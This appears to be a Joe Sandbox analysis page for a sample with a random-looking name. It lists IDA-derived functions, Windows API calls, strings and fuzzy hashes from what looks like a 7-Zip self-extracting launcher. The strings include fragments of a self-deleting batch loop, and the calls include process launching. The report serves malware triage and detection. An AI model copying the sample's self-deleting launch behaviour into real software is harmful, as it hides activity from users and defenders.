Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: a7cdcc9f98ce9dbc60a73427d99236a85b447d866e4190eca6a24d33d7e231e4
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: E421D33290062557CB02CE6EE4945A7F3A2FBD436AF174727ED8463290C628AC54C6A0

Function 0041962B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: 97b97acb8ff96b1b4e43437944a1cf665e1ec4585e0b194a145c9dbb8504525b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 6F21297251442587C701DF5DE4986B7B3E1FFD4319F678A37D9818B180C638DC85D6A4

Function 00401DCA Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 196threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

GetCommandLineW.KERNEL32(0041A9F0,00000000,00000000), ref: 00401DEC

Part of subcall function 00411A62: memcpy.MSVCRT(?,?,00000000,00000001,?,?,00000000,?,?,00401E36,00000000,0000003A,?," -,sfxwaitall), ref: 00411A87

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E98
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -), ref: 00401EA0
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?), ref: 00401EA8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A), ref: 00401EB0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000), ref: 00401EB8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?), ref: 00401EC0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?), ref: 00401EC8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020), ref: 00401ED0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?), ref: 00401ED8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022), ref: 00401EE0
GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401EF3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 00401F19
GetLastError.KERNEL32 ref: 00401F23
??3@YAXPAX@Z.MSVCRT(?), ref: 00401F2E
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00401F36
CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00401F4D
AssignProcessToJobObject.KERNEL32(00000000,?), ref: 00401F5E
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000), ref: 00401F6D
SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00401F8A
ResumeThread.KERNEL32(?), ref: 00401F93
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF), ref: 00401FB6
ResumeThread.KERNEL32(?), ref: 00401FBF
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401FCA
CloseHandle.KERNEL32(?), ref: 00401FD9
GetExitCodeProcess.KERNEL32(?,?), ref: 00401FE2
GetLastError.KERNEL32 ref: 00401FEC
CloseHandle.KERNEL32(?), ref: 00401FF8
CloseHandle.KERNEL32(00000000), ref: 00401FFF
CloseHandle.KERNEL32(?), ref: 00402009

Strings

" -, xrefs: 00401E01
sfxwaitall, xrefs: 00401DFC

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$??2@CompletionErrorLastResumeThreadmemcpy$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 1989023053-3991362806
Opcode ID: b512eb50f073bc5073f6029a29708b2a397875fe1bb3ba0b5eecb9327caccc6b
Instruction ID: 5297b6db97987cb25ecf0bcc30189225a2ece590cb556cf519fd76e88c7d76d0
Opcode Fuzzy Hash: b512eb50f073bc5073f6029a29708b2a397875fe1bb3ba0b5eecb9327caccc6b
Instruction Fuzzy Hash: 21615A32500109BFDF11AF61DC45DEE7BB9AF04348F14813AFA12A21B1EB39AD95CB59

Function 00405B8E Relevance: 38.6, APIs: 14, Strings: 8, Instructions: 145fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract), ref: 00405BD5

Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
Part of subcall function 0040439D: wsprintfW.USER32 ref: 00404400
Part of subcall function 0040439D: GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405C09
WriteFile.KERNEL32(00000000,?,?,0041E844,00000000,00000001,",?,del "," goto Repeat,004070C0,if exist ",",004070C0,del ",:Repeat), ref: 00405CB8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CC3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CCA
SetFileAttributesW.KERNEL32(004070C0,00000000,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CE1
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405CF3
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CFC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405D05
??3@YAXPAX@Z.MSVCRT(004070C0,?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C), ref: 00405D0D

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00411CE3: memcpy.MSVCRT(?,?,?,00000000,?,?,004046EB,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 00411D06

Part of subcall function 00404473: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00000000,0041E080,00920E58,004016D0,0000FDE9,00920E58), ref: 004044A6

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405D20
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405D28
??3@YAXPAX@Z.MSVCRT(004070C0,?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C), ref: 00405D30
??3@YAXPAX@Z.MSVCRT(004070C0,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract), ref: 00405D3B

Strings

7ZSfx%03x.cmd, xrefs: 00405BE8
if exist ", xrefs: 00405C58
", xrefs: 00405C4A, 00405C4F, 00405C93
PreExtract, xrefs: 00405B9D
:Repeat, xrefs: 00405C23
" goto Repeat, xrefs: 00405C71
del ", xrefs: 00405C30, 00405C35, 00405C7E
open, xrefs: 00405CED

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$File$memcpy$??2@AttributesPathTemp$ByteCharCloseCreateDriveExecuteHandleMultiShellTypeWideWritewsprintf
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$PreExtract$del "$if exist "$open
API String ID: 1368565367-2062918900
Opcode ID: 6a2c42ab4ba589dd8ec8f7f6231d9d8f7900a9009e1932f2d8cd21323a083c06
Instruction ID: e7338ad49e5ec867d94482016769a831fa3651e0b874e5bd32b93c107b1fbaea
Opcode Fuzzy Hash: 6a2c42ab4ba589dd8ec8f7f6231d9d8f7900a9009e1932f2d8cd21323a083c06
Instruction Fuzzy Hash: BE415031904004BADB05EBA1DC5ADEF7B75EF45304F10806BF602B61A5EB786EC5CB98

Function 00408F3F Relevance: 36.3, APIs: 24, Instructions: 265windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
LoadIconW.USER32(00000000), ref: 00408F6C
GetSystemMetrics.USER32(00000032), ref: 00408F80
GetSystemMetrics.USER32(00000031), ref: 00408F85
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
LoadImageW.USER32(00000000), ref: 00408F91
SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA

Part of subcall function 00408618: GetDlgItem.USER32(?,?), ref: 00408629
Part of subcall function 00408618: GetWindowTextLengthW.USER32(00000000), ref: 0040862C
Part of subcall function 00408618: GetDlgItem.USER32(?,?), ref: 00408641

Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

GetDlgItem.USER32(?,000004B2), ref: 00408FD7
GetDlgItem.USER32(?,000004B2), ref: 00408FE1
GetWindowLongW.USER32(?,000000F0), ref: 00408FED
SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
GetDlgItem.USER32(?,000004B5), ref: 0040900A
GetDlgItem.USER32(?,000004B5), ref: 00409018
GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
GetDlgItem.USER32(?,000004B2), ref: 00409040
GetWindow.USER32(?,00000005), ref: 0040911F
GetWindow.USER32(?,00000005), ref: 0040913B
GetWindow.USER32(?,00000005), ref: 00409153
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,00000000,?,?,?,?,?,0040932F), ref: 004091B3
LoadIconW.USER32(00000000), ref: 004091BA
GetDlgItem.USER32(?,000004B1), ref: 004091D9
SendMessageW.USER32(00000000), ref: 004091DC

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ItemWindow$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 4137352925-0
Opcode ID: ce9f75e029d06e7367fd13abbf1c97b27e9b6aa4c7e0128f4e9ec34cf0a6066f
Instruction ID: 55e12659e9cef202b758582d1d7e0fb50da9d044521ae722c1703057fdaec8c6
Opcode Fuzzy Hash: ce9f75e029d06e7367fd13abbf1c97b27e9b6aa4c7e0128f4e9ec34cf0a6066f
Instruction Fuzzy Hash: DD71D5703447067BEA256B218D4AF2F3A99DB84704F10483EF652BA2D3CB7DDC019A5E

Function 00404C8C Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 115windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00404C9E
lstrcmpiA.KERNEL32(?,STATIC), ref: 00404CB1
GetWindowLongW.USER32(?,000000F0), ref: 00404CBE

Part of subcall function 00404BDD: GetWindowTextLengthW.USER32(?), ref: 00404BEA
Part of subcall function 00404BDD: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404C04

??3@YAXPAX@Z.MSVCRT(?,?,00000005,?,000000F0,?,?,00000040), ref: 00404CE8
GetParent.USER32 ref: 00404CF6
LoadLibraryA.KERNEL32(riched20,?,00000005,?,000000F0,?,?,00000040), ref: 00404D0A
GetMenu.USER32 ref: 00404D1B
SetThreadLocale.KERNEL32(00000419,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404D28
CreateWindowExW.USER32(00000000,RichEdit20W,0041AA3C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00404D58
DestroyWindow.USER32(?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404D65
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00404D7A
GetSysColor.USER32(0000000F), ref: 00404D7E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00404D8C
SendMessageW.USER32(00000000,00000461,?,?), ref: 00404DB2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404DB7
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404DBF

Strings

riched20, xrefs: 00404D05
RichEdit20W, xrefs: 00404D52
{\rtf, xrefs: 00404CD7
STATIC, xrefs: 00404CA8

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: 31280b59029b913c7dd6943f30d46b327974baec36b110e02c3e2059bbe9df94
Instruction ID: 47a03a17b0e693a7b9506e1f1950c79874d349430206e003879b4e45598c68c3
Opcode Fuzzy Hash: 31280b59029b913c7dd6943f30d46b327974baec36b110e02c3e2059bbe9df94
Instruction Fuzzy Hash: 4131C271A02119BFDB01ABA1DD49EEF7B7DEF44704F10402AF601B2291DB794E508B6D

Function 00403AD9 Relevance: 31.6, APIs: 21, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00403AE8
GetDeviceCaps.GDI32(00000000,00000058), ref: 00403AF4
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403B0D
GetObjectW.GDI32(?,00000018,?), ref: 00403B44
MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B51
MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B5D
CreateCompatibleDC.GDI32(?), ref: 00403B6B
CreateCompatibleDC.GDI32(?), ref: 00403B73
SelectObject.GDI32(00000002,?), ref: 00403B83
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403B91
SelectObject.GDI32(00000000,00000000), ref: 00403B99
SetStretchBltMode.GDI32(00000000,00000004), ref: 00403BA1
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403BC0
GetCurrentObject.GDI32(00000000,00000007), ref: 00403BC9
SelectObject.GDI32(00000002,?), ref: 00403BD8
SelectObject.GDI32(00000000,?), ref: 00403BDE
DeleteDC.GDI32(00000002), ref: 00403BE9
DeleteDC.GDI32(00000000), ref: 00403BEC
ReleaseDC.USER32(00000000,?), ref: 00403BF2
ReleaseDC.USER32(00000000,?), ref: 00403C01
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00403C0E

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: 82980da23295317485c8058d9f32326a8285abc7e5f11a3e30116cecc0f103df
Instruction ID: a0072e5f292db19c94c8224914de7ba953a02d223df6358cf2059d22beae88df
Opcode Fuzzy Hash: 82980da23295317485c8058d9f32326a8285abc7e5f11a3e30116cecc0f103df
Instruction Fuzzy Hash: AE410675C01218BFDF129FE1DC49EEEBF79EB08365F108066F600B2161C7764A60AB65

Function 00401765 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 273stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

lstrlenW.KERNEL32(00920E58,?,0041E138,?,?,?,?,?,?,?,?,?,?,?,004066C2,?), ref: 0040177F

Part of subcall function 004030D4: lstrlenW.KERNEL32(0041AA80,?,00920E56,?,0041E7B8,004017EC), ref: 004030E3
Part of subcall function 004030D4: lstrlenW.KERNEL32(00920E58,?,0041E7B8,004017EC,?,?,?,?,?,?,?,?,?,?,?,004066C2), ref: 004030E8
Part of subcall function 004030D4: _wcsnicmp.MSVCRT ref: 004030F1

_wtol.MSVCRT ref: 0040195A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,004066C2,?,00000000), ref: 00401A24
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00401A6A
??3@YAXPAX@Z.MSVCRT(?,00000001,?,?,?,00920E52,00000001), ref: 00401A93
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,00000000), ref: 00401A72

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

Part of subcall function 00411A27: memcpy.MSVCRT(?,?,?,?,00920E56,00920E52,0041E7B8,00401ACD,?,?,00920E52,00000001), ref: 00411A4A

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

??3@YAXPAX@Z.MSVCRT(?,?,?,?,00920E52,00000001), ref: 00401ADB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00920E52,00000001), ref: 00401AE3

Strings

SfxVarCmdLine1, xrefs: 00401AA6
BeginPromptTimeout, xrefs: 0040197F
SfxVarCmdLine2, xrefs: 00401AFF
GUIFlags, xrefs: 004018A9
MiscFlags, xrefs: 004018C7
bpt, xrefs: 0040196B
OverwriteMode, xrefs: 0040184D
GUIMode, xrefs: 0040188B
SelfDelete, xrefs: 00401901

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$lstrlenmemcpy$??2@$_wcsnicmp_wtol
String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$SfxVarCmdLine2$bpt
API String ID: 2996597252-1537130225
Opcode ID: ad5e06bf1efe9115dcaa34b549b77952ed5be3fd3def1db1c45ef10eeb062460
Instruction ID: 802da4c3352fe68454c51109ac8192462bb21426cb5da7d8071438425f36007c
Opcode Fuzzy Hash: ad5e06bf1efe9115dcaa34b549b77952ed5be3fd3def1db1c45ef10eeb062460
Instruction Fuzzy Hash: 2FA19231A012018ADB28EB52C5555FEB7B5AF41344B64C43FE842B32F5EB3CAA85C75E

Function 0040941A Relevance: 28.6, APIs: 19, Instructions: 149windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

GetDlgItem.USER32(?,000004B8), ref: 00409447
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00409456
GetDlgItem.USER32(?,000004B4), ref: 0040947D

Part of subcall function 00407A0F: SetWindowTextW.USER32(00000000,00000000), ref: 00407A17

